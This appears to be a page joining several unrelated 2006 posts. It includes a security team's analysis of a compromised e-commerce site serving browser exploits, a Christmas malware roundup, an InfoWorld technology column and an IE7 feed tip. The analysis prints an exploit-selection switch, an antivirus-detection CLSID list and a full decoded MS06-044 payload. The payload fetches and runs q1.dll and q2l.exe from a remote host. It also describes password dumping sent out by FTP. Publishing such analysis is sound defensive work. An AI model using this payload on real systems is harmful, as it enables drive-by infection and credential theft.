Computers

We have recorded a video, to see the exploit in action.

First, the user connects to a web page which uses the exploit to launch the download of the files: q1.dll y q2l.exe. Then, when q2.exe is executed, it moves the dll to another directory to prevent the deletion of the files, as they are downloaded into a temp directory.

This dll is injected into the Internet Explorer, in order to perform background tasks. Among other things it dumps proxy, email, configuration, and cached passwords... We have attached a sample of the dumped file, there you can see the proxy authentication data. This malware has ftp capabilities to upload the dumped files to an external server.

Thanks again to Ismael Briones.

View Video
Format: avi
Duration: --:00

Spain is different. We even have April Fool's day on December, 28! But nonetheless, today's post is gonna be serious. Really.

Christmas are here to stay, at least for a few more days. Santa Claus gives way to New Year's Eve and the Three Wise Men, and crimeware won't lose the opportunity of tampering with computers worlwide in order to steal as much money as possible.

Social engineering is usually a weapon of opportunity. Be it Valentine's Day, Christmas or the FIFA World Cup, there will always be cybercrooks who will take advantage of the season and use that theme in their messages. Here are a few examples:

• The worm Atak (variants H, I and J) also was cheerful: "Mery Chrismas & Happy New Year! 2005 will be the beginning!". In fact, it was the beginning, but for crimeware and the like of it.

• Mimail.N and Downloader.AC spoke of a great New Year offer from Paypal in order to entice users into running their malicious files.

• Nabload.U and Banker.BSX. These Trojans teamed up during last year's Christmas season. How could their authors have found a better season to release a banking Trojan and its downloader?

Let's be careful out there... And let’s not fall for so-easy-to-spot tricks.

***Of course, the Three Wise Men know who you are... And you will receive coal in instead of gifts. Really.

A few days ago some small e-Commerce sites were compromised. You can find more information at [http://www.securityfocus.com/archive/75/455149]. Those sites were being used to distribute payloads for a Microsoft vulnerability, MS06-044 [http://www.microsoft.com/technet/security/Bulletin/MS06-044.mspx].

We have been investigating the files on one of  those servers and we have found javascript code that selects the vulnerability to exploit based on the user's browser, as we can see below:

	switch (system_id) {
	case "ie7":	
	case "ie6_xp":
	case "ie6_unknown":	
	case "ie6_xpsp2":
		exp_vml();
		break;
	case "ie6_xpsp1":
		exp_vml();
		break;
	case "ie6_xpsp0":
		exp_iscomponentinstalled();
		break;
	case "ie6_2k":
		exp_vml();
		break;
	case "ie5_2k":
		exp_ms06_044();
		break;
	case "ie5_nt":
		break;
	case "ff104":
		exp_ff104();
		break;
	case "ff150":
		exp_ff154();
		break;
	default:
		break;
	}

Also, the code is able to detect if there is an AntiVirus product installed. To do so, it instantiates some CLSID and ActiveX Objects used by the following AV companies:

progs=['NAVCfgWizDll.NAVCfgWizMgr',            //  1 NAV
       'McGDMgr.DwnldGroupMgr'];               //  2 McAfee

cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4',  //  3 trendmicro
      '091EB208-39DD-417D-A5DD-7E2C2D8FB9CB',  //  4 Windows Defender
      'D653647D-D607-4DF6-A5B8-48D2BA195F7B',  //  5 BitDefender Antivirus
      '9F97547E-4609-42C5-AE0C-81C61FFAEBC3',  //  6 AVG7 
      '65756541-C65C-11CD-0000-4B656E696100',  //  7 Panda Antivirus
      '1474F601-9B4B-4EB0-81FA-20F753C0E1A4',  //  8 F-Prot
      'D5507020-DB45-11d1-A5F0-00600872F78D',  //  9 Norman Virus Control
      'DD230880-495A-11D1-B064-008048EC2FC5',  // 10 Kaspersky
      'B089FE88-FB52-11D3-BDF1-0050DA34150D',  // 11 Nod32
      '472083B0-C522-11CF-8763-00608CC02F24',  // 12 Avast
      '45AC2688-0253-4ED8-97DE-B5370FA7D48A',  // 13 Antivir
      '8934FCEF-F5B8-468F-951F-78A921CD3920',  // 14 Ewido
      '1EB2409C-6E28-4066-9738-97A1B8F5639C',  // 15 ??
      'E7593602-124B-47C9-9F73-A69308EDC973',  // 16 Dr Web
      'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32

Now we are going to analyze the MS06-044 payload:

The code is the same published by HD Moore at the Month of Browser Bugs [http://browserfun.blogspot.com/2006/08/ms06-044-internet-explorer-5x.html]. It exploits a local zone privilege escalation vulnerability for Internet Explorer 5 on Windows 2000.

That payload uses the XMLHttpRequest (used in AJAX applications) to download in the background two files: q2l.exe and q1.dll from http://***.cc/q/ to the Windows Temp directory: C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp (this directory is obtained from the Windows environment variable TEMP).

Finally the files are executed with the following command line: C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\q2l.exe C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\q1.dll C:\Program Files\Internet Explorer\iexplore.exe


The payload is encoded with the "unescape" javascript function. This is the decoded payload:

<html><head></head><body>
<script language='javascript'>
function get_file(xml, o, url, file)
{
        xml.open("GET", url, false);
        xml.send(null);
        var dat = xml.responseBody;
        // xml.close();

        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(dat);
        o.SaveToFile(file, 2);
        o.Close();
}

function go(server_addr)
{
        //alert("Started ok! server_addr=["+server_addr+"]");

        var s = new ActiveXObject("WScript.Shell");
        var o = new ActiveXObject("ADODB.Stream");
        var e = s.Environment("Process");

        var q1_url  = "http://"+server_addr+"/q/q1.dll";
        var q2l_url = "http://"+server_addr+"/q/q2l.exe";
        var xml = null;
        var q1 = e.Item("TEMP") + "\\q1.dll";
        var q2l = e.Item("TEMP") + "\\q2l.exe";
        var pf = e.Item("PROGRAMFILES");
        var dat;

        try { xml=new XMLHttpRequest(); }
        catch(e) {
                try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
                catch(e) {
                        xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
                }
        }

        if (!xml) {
                alert("Failed to create XMLHTTP object");
                return(0);
        }

        xml.open("GET", q1_url, false);
        xml.send(null);
        dat = xml.responseBody;

        get_file(xml, o, q1_url, q1);
        get_file(xml, o, q2l_url, q2l);
        var run_cmd = '"'+q2l+'" "'+q1+'" "'+pf+'\\Internet Explorer\\iexplore.exe"';
        // var run_cmd ='cmd.exe /c calc.exe';
        //alert('Executing the payload: ['+run_cmd+']');
        s.Run(run_cmd, 0);
}

go('***.cc');</script>
</body></html>

We would like to thank Ismael Briones for gathering all this information.

(InfoWorld) - Some Decembers, I look to the coming year and pray that I can earn my keep on the unpredictable visits from my muse that result in a departure from some of my more done-to-death subjects. It’s something of a relief to leave behind 2006, a year in which I spent loads of time yelling into the wind that Intel, despite its best work to date, is farther behind AMD than ever.

In 2007, let’s agree to focus on scalability. Let’s see what happens to power draw and performance when we turn off CPU cores, and black out entire sockets one by one on Intel and AMD multicore systems. Subtraction is revealing. Next year, let’s look at the tangible differences between robust multicore as IBM and AMD implement it, and approximated multicore as Intel does it.

Next year, let’s take a fresh look at long-forgotten PC UNIX, the simple beauty that, but for in-fighting and litigiousness, would have given us a slender, mature, inviolable operating system core. Open source development would have thrived with that foundation. Next year, let’s take a close and frank look at Apple’s OS X Leopard and its Darwin core, which Apple claims will be UNIX-certified on its release. Let’s watch what happens to System V UNIX, a criminally neglected property that belongs in the public’s hands and under responsible stewardship, which means having it taken from SCO.

Open source Java is a greater boon than anyone imagines, not only to open source but to commercial development as well. Freedom to optimize, extend (with deviation from the specification punished by torture) and, to my mind, just plain understand what should be the hottest dynamic language on the planet for both clients and servers will carry Java to new places. By the same token, 2007 will be many developers’ first encounter with Objective-C. I was put off by the Win32-like burdens it placed on developers; miscounted memory, file handles and such resources accounted for much of a Mac application’s debugging and QA effort. I’m hopeful that Objective-C, which, contrary to belief is not an Apple language but a native compiled language in the GNU compiler collection, will find favor on platforms other than the Mac. Its ready rapport with Java balances Java’s dynamic freedom with the speed of native code.

Last, let’s agree to keep little black books of emerging technologies we want to follow. Let’s remember that the greatest opportunities do not lie in the places where the crowds are forming, but in the quieter places no one thinks to look. There are hungry, impoverished, frightened and isolated people who are truly worthwhile investments, and their communities are genuine, ground-floor emerging markets. In these places, interest bearing micro-loans of a few hundred dollars breed sustainable businesses. Technology and connectivity will have an even greater impact with return that’s just as rapid.

Don’t be motivated by pity; it’s corrosive. Instead, close your eyes and know that genius and drive exist in the same proportion among the unfortunate as they do among the fortunate. One teenager blogging from a place the “civilized world” has forgotten can gain a following, get picked up by a magazine and change his life and the lives of all those around him. Create possibilities with an eye toward profiting from them; I forgive you. While we wait like new parents for altruistic motivation to care for others, we waste opportunities where investment serves the needy better than charity.

Some of you are starting the migration to IE 7. Others are probably experiencing the browser with your new PC. Either way, one new feature you’ll want to research is the ability to subscribe to web feeds or RSS. Microsoft has added some nice touches to their integrated feed reader including a common feed list. If you’ve never explored the world of syndicated content, now’s the time. We have a quick tutorial showing how easy it is to subscribe to a feed.